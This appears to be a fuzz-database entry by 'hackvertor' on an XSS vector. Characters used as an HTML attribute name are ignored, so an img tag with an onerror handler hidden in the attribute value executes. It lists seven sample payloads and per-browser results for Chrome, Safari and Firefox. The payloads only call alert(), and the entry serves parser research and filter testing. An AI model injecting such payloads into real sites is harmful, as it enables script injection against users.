Characters ignored in an attribute name

Chrome: 7 results
Safari: 7 results
Firefox: 7 results

This vector shows which characters, when used as an attribute name, are ignored by the HTML parser, so that the img element inside the would-be attribute value is parsed as markup and its onerror handler executes.

Created by: hackvertor

Created on: Tuesday, May 28, 2024 at 7:38:17 PM

Updated on: Friday, September 13, 2024 at 3:18:55 PM

Vector type: XSS

Template used:
<div $[chr]="><img src=x:x onerror=log($[i])>"></div>

Sample payloads

<div 	="><img src=x:x onerror=alert(9)>"></div>
<div 
="><img src=x:x onerror=alert(10)>"></div>
<div ="><img src=x:x onerror=alert(12)>"></div>
<div 
="><img src=x:x onerror=alert(13)>"></div>
<div  ="><img src=x:x onerror=alert(32)>"></div>
<div /="><img src=x:x onerror=alert(47)>"></div>
<div >="><img src=x:x onerror=alert(62)>"></div>

Fuzz results

Chrome 125.0.0.0 Unknown Unknown

Updated: Tue May 28 2024
Found 7 results

Dec  Hex  Chr
9    09   HT
10   0a   LF
12   0c   FF
13   0d   CR
32   20   SPACE
47   2f   /
62   3e   >

Safari 17.4 Unknown Unknown

Updated: Tue May 28 2024
Found 7 results

Dec  Hex  Chr
9    09   HT
10   0a   LF
12   0c   FF
13   0d   CR
32   20   SPACE
47   2f   /
62   3e   >

Firefox 126.0 Unknown Unknown

Updated: Tue May 28 2024
Found 7 results

Dec  Hex  Chr
9    09   HT
10   0a   LF
12   0c   FF
13   0d   CR
32   20   SPACE
47   2f   /
62   3e   >

Safari 17.5 mobile iOS 17.5.1

Updated: Fri Jun 07 2024
Found 7 results

Dec  Hex  Chr
9    09   HT
10   0a   LF
12   0c   FF
13   0d   CR
32   20   SPACE
47   2f   /
62   3e   >